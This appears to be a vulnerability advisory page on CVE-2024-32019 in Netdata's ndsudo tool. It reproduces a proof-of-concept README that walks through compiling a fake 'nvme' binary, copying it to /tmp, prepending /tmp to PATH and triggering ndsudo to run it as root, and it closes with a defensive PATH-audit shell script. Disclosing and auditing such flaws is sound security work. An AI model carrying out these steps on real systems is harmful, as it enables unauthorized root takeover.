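Netdata ndsudo Privilege Escalation Vulnerability

Vulnerability Information

Vulnerability name: Netdata ndsudo Privilege Escalation Vulnerability

Vulnerability ID: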

  • CVE: CVE-2024-32019

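Vulnerability type: Privilege escalation

Severity: High

Description: Netdata is an open-source, real-time performance and health monitoring tool, widely used in server and cloud environments to monitor system resources, applications, and services. It provides a user-friendly web interface that lets users easily view and analyze monitoring data. Netdata's ndsudo tool is a local privilege elevation tool that allows users to run specific commands with root privileges. However, because of a design flaw in ndsudo, an attacker can place a malicious binary on the user's PATH environment variable and use ndsudo to execute malicious commands, achieving local privilege escalation. The root cause is that ndsudo does not sufficiently validate and restrict the commands supplied by the user, which lets an attacker bypass the intended security restrictions. With this vulnerability, an attacker can escalate from local access to root without any authentication and take full control of the system. This can lead to disclosure of sensitive data and can be used for further attack activity, such as installing backdoors or modifying system configuration. Because Netdata is widely used, the impact is broad, and users need to update to a fixed version promptly to avoid potential security risk.

Vendor: Netdata

Product: Netdata

Source: https://github.com/AzureADTrent/CVE-2024-32019-POC

Type: CVE-2024:github search

Repository files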

  • README.md
  • poc.c

Source overview

Privilege Escalation via ndsudo (Netdata Local Exploit)

This POC is used to exploit a vulnerable ndsudo utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s PATH that impersonates a trusted command (nvme) and is executed with root privileges by ndsudo.


Prerequisites & Assumptions

  • You have local shell access on the target system.

  • You can execute the following command but it fails with a “not found” or similar error:

    ./ndsudo nvme-list

1. Compile the Malicious Payload

On your attacker machine (or the vulnerable system if it has a compiler), compile a malicious binary (for example, from a file poc.c):

gcc poc.c -o nvme

This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.


2. Transfer the Payload to the Target System

Move or upload the compiled nvme binary to a directory writable by your user, such as /tmp:

scp nvme user@target:/tmp/
# or use any file upload method you have

3. Prepare the Payload for Execution

On the target system, make sure the binary is executable and prepend its directory to your PATH:

chmod +x /tmp/nvme
export PATH=/tmp:$PATH

This ensures ndsudo will resolve and execute your malicious nvme instead of the legitimate one.


4. Trigger ndsudo to Execute Your Payload

Run the vulnerable command to trigger ndsudo:

./ndsudo nvme-list
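
A defensive check for the PATH resolution problem the steps above rely on, as an added example that is not part of the original README or of Netdata: it reports where a command name such as nvme resolves and flags a match that sits outside an allowlist or in a world-writable directory. The TRUSTED_DIRS list and the function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit how a command name resolves through a PATH string.
# TRUSTED_DIRS is an assumption; set it to the root-owned directories your
# distribution actually installs system binaries into.
TRUSTED_DIRS="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Print the first executable regular file named $1 found in PATH string $2.
first_match() {
    fm_rest="$2:"
    while [ -n "$fm_rest" ]; do
        fm_dir=${fm_rest%%:*}
        fm_rest=${fm_rest#*:}
        [ -n "$fm_dir" ] || fm_dir=.   # an empty PATH entry means the current directory
        if [ -f "$fm_dir/$1" ] && [ -x "$fm_dir/$1" ]; then
            printf '%s\n' "$fm_dir/$1"
            return 0
        fi
    done
    return 1
}

# Succeed if directory $1 is on the trusted list and is not world-writable.
is_trusted_dir() {
    case ":$TRUSTED_DIRS:" in
        *":$1:"*) ;;
        *) return 1 ;;
    esac
    [ -z "$(find "$1" -prune -perm -0002 2>/dev/null)" ]
}

# audit_cmd NAME [PATHSTRING]: 0 = trusted, 1 = untrusted location, 2 = not found.
audit_cmd() {
    ac_hit=$(first_match "$1" "${2-$PATH}") || { echo "NOT-FOUND $1"; return 2; }
    if is_trusted_dir "${ac_hit%/*}"; then
        echo "OK $ac_hit"
        return 0
    fi
    echo "UNTRUSTED $ac_hit"
    return 1
}

# Report for the current environment; nvme is the command name from the page.
audit_cmd nvme || true
```

Run it as the account that is allowed to invoke ndsudo; an UNTRUSTED result means a setuid helper that searches the caller's PATH would pick up that file first.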

Resources


Netdata ndsudo Privilege Escalation Vulnerability
http://example.com/2025/08/03/github_2284225921/
Author: lianccc
Published: August 3, 2025